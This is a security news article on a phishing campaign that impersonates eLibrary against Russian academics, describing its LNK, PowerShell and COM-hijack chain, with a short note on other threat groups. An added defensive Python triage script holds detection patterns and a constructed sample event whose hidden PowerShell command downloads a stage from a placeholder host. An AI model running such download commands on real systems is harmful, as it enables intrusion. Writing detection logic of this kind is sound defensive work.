A sophisticated threat actor, previously linked to Operation ForumTroll, has resurfaced with a new wave of targeted phishing attacks aimed at individuals within Russia, according to recent findings by cybersecurity firm Kaspersky. The campaign, which began in October 2025, focuses on academics in political science, international relations, and global economics at prominent Russian universities and research institutions.
This latest activity marks a shift from earlier campaigns by the same group, which had primarily targeted organizations. The threat actor’s origins remain unknown, but their operational methodology suggests a well-resourced and persistent entity. Operation ForumTroll itself is known for leveraging vulnerabilities, including a previously undisclosed zero-day flaw in Google Chrome (CVE-2025-2783), to deploy malicious software like the LeetAgent backdoor and the Dante spyware.
Operation ForumTroll’s Evolving Tactics
The current phishing campaign commences with emails that impersonate eLibrary, a significant Russian scientific electronic library. These fraudulent messages are dispatched from an email address, “support@e-library[.]wiki,” which utilizes a domain registered in March 2025. This strategic domain aging, occurring six months prior to the campaign’s launch, was likely intended to circumvent security alerts typically associated with newly created domains.
To further bolster their deception, the attackers hosted an exact replica of the legitimate eLibrary homepage (“elibrary[.]ru”) on their spoofed domain. This tactic aimed to lend an air of authenticity and encourage potential victims to engage with the malicious content. The emails instructed recipients to click an embedded link, ostensibly to download a plagiarism report.
Should a target fall for the ruse and click the link, a ZIP archive is downloaded onto their system. The archive is meticulously named using a pattern incorporating the victim’s last name, first name, and patronymic, enhancing the personalization of the attack. Furthermore, these malicious links are designed for single use. Any subsequent attempt to access the same URL will result in a “Download failed, please try again later” message in Russian. Those attempting the download from non-Windows platforms are similarly redirected to retry on a Windows computer.
Payload and Persistence Mechanisms
The downloaded ZIP archive contains a Windows shortcut (LNK) file. When the victim opens the shortcut, it runs a PowerShell script, which in turn downloads and launches a second PowerShell-based payload hosted on a remote server. That payload contacts a command-and-control (C2) server to retrieve the final-stage DLL. To maintain persistence, the attackers employ COM hijacking.
In parallel with establishing its foothold, the payload downloads and presents a decoy PDF document to the victim. This serves to distract the user while the malicious software operates in the background. The ultimate payload deployed is a framework known as Tuoni, which functions as both a command-and-control system and a red teaming tool. This grants the threat actors comprehensive remote access and control over the victim’s Windows device.
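As an added defender-side illustration (not code from Kaspersky or from the article), the following Python triage script checks for the signals described above: a sender domain that mimics elibrary.ru, a domain aged long enough to slip past a "newly registered" alert, and the shortcut-to-PowerShell-download and COM-hijack stages in constructed Sysmon-style events. The event layout, the 30-day age threshold and the per-user CLSID InprocServer32 registry path are assumptions.

```python
"""Triage helpers for the eLibrary-themed phishing chain (added example, not Kaspersky's code).
Event layout, the 30-day 'new domain' threshold and the CLSID InprocServer32 key are assumptions."""
import re
from datetime import date
from typing import Optional

KNOWN_BRANDS = {"elibrary": "elibrary.ru"}  # brand -> its genuine domain (assumption)

def _squash(label: str) -> str:
    """'e-library' and 'elibrary' should compare equal: drop separators, lowercase."""
    return re.sub(r"[^a-z0-9]", "", label.lower())

def lookalike_sender(sender: str) -> Optional[str]:
    """Return the impersonated brand when the sender's registrable domain mimics it but is not it."""
    domain = sender.rsplit("@", 1)[-1].lower()
    registrable = ".".join(domain.split(".")[-2:])
    label = registrable.split(".")[0]
    for brand, real in KNOWN_BRANDS.items():
        if _squash(label) == _squash(brand) and registrable != real:
            return brand
    return None

def new_domain_alert(registered: str, seen: str, threshold_days: int = 30) -> bool:
    """Age-only check (ISO dates) of the kind that six months of domain aging is meant to defeat."""
    return (date.fromisoformat(seen) - date.fromisoformat(registered)).days < threshold_days

# Per-user COM hijack: a CLSID's InprocServer32 written under HKCU (Sysmon logs it as HKU\<SID>).
COM_HIJACK_KEY = re.compile(
    r"(HKCU|HKU\\[^\\]+)\\Software\\Classes\\CLSID\\\{[0-9A-F-]+\}\\InprocServer32", re.I)
DOWNLOAD_CMD = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile", re.I)

def triage(events: list) -> list:
    """Return the chain stages observed in Sysmon-style process/registry events, in order."""
    stages = []
    for e in events:
        if (e.get("type") == "process" and e.get("parent", "").lower().endswith("explorer.exe")
                and e.get("image", "").lower().endswith("powershell.exe")
                and DOWNLOAD_CMD.search(e.get("cmdline", ""))):
            stages.append("lnk_to_powershell_download")  # user opened the shortcut, script fetches stage 2
        elif e.get("type") == "registry" and COM_HIJACK_KEY.search(e.get("key", "")):
            stages.append("com_hijack_inprocserver32")
    return stages

SAMPLE_EVENTS = [  # constructed telemetry, not captured from the campaign
    {"type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -w hidden -c Invoke-WebRequest https://stage.invalid/p -OutFile $env:TEMP\p"},
    {"type": "registry", "key": r"HKU\S-1-5-21-1\Software\Classes\CLSID\{00000000-0000-0000-0000-000000000001}\InprocServer32"},
]

if __name__ == "__main__":
    print(lookalike_sender("support@e-library.wiki"), new_domain_alert("2025-03-01", "2025-10-01"))
    print(triage(SAMPLE_EVENTS))
```

The point of pairing the two mail checks is that an age threshold alone returns no alert for the March-registered domain, while the brand lookalike check still flags it.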
Kaspersky notes that Operation ForumTroll has been actively targeting entities and individuals in Russia and Belarus since at least 2022. Given this prolonged operational history, it is highly probable that the group will continue its activities, focusing on individuals and organizations of interest within these regions.
Broader Threat Landscape
This latest campaign by the Operation ForumTroll actor comes against a backdrop of other significant cybersecurity developments. Positive Technologies recently detailed the operations of two distinct threat clusters: QuietCrabs, suspected of being a Chinese state-sponsored hacking group also tracked as UTA0178 and UNC5221, and Thor, a group implicated in ransomware attacks since May 2025.
These intrusion sets have been observed exploiting notable security vulnerabilities, including flaws in Microsoft SharePoint (CVE-2025-53770), Ivanti Endpoint Manager Mobile (CVE-2025-4427 and CVE-2025-4428), Ivanti Connect Secure (CVE-2024-21887), and Ivanti Sentry (CVE-2023-38035). QuietCrabs, for instance, leverages initial access to deploy an ASPX web shell, which in turn delivers a JSP loader capable of executing KrustyLoader. This loader then deploys the Sliver implant.
The Thor threat group, first detected targeting Russian companies in 2025, has been observed employing LockBit and Babuk ransomware as final payloads. They also utilize Tactical RMM and MeshAgent to ensure persistent access. The ongoing activities of these diverse threat actors highlight the dynamic and persistent nature of cyber threats targeting the region.
Looking ahead, the continued sophistication and adaptability of threat actors like the one behind Operation ForumTroll suggest that vigilance and robust security measures will remain paramount for individuals and organizations in Russia and neighboring countries. The focus on specific academic and research populations raises concerns about potential future targeting of sensitive information and intellectual property.